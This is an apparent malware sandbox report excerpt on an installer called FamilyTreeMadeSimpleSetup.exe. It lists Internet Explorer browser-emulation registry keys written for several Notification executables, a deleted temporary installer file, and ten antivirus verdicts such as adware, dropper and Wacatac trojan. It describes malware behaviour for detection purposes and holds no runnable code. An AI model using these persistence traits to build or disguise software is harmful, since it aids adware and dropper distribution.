registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0017.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_007.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BEHAVIORS\Support Chat.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0019.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0020.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0013.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0016.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0014.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_006.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_001.exe

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\is-53LRT.tmp\installersetup1.tmp

File has been identified by 10 AntiVirus engines on VirusTotal as malicious (10 events)

Malwarebytes	PUP.Optional.BundleInstaller
K7AntiVirus	Adware ( 00588bef1 )
K7GW	Adware ( 00588bef1 )
Elastic	malicious (moderate confidence)
Kaspersky	UDS:Trojan-Dropper.Win32.Dapato.rbpa
Cynet	Malicious (score: 100)
McAfee-GW-Edition	BehavesLike.Win32.Dropper.tc
Microsoft	Trojan:Win32/Wacatac.B!ml
McAfee	Artemis!15D662C8C085
MaxSecure	Trojan.Malware.300983.susgen

FamilyTreeMadeSimpleSetup.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All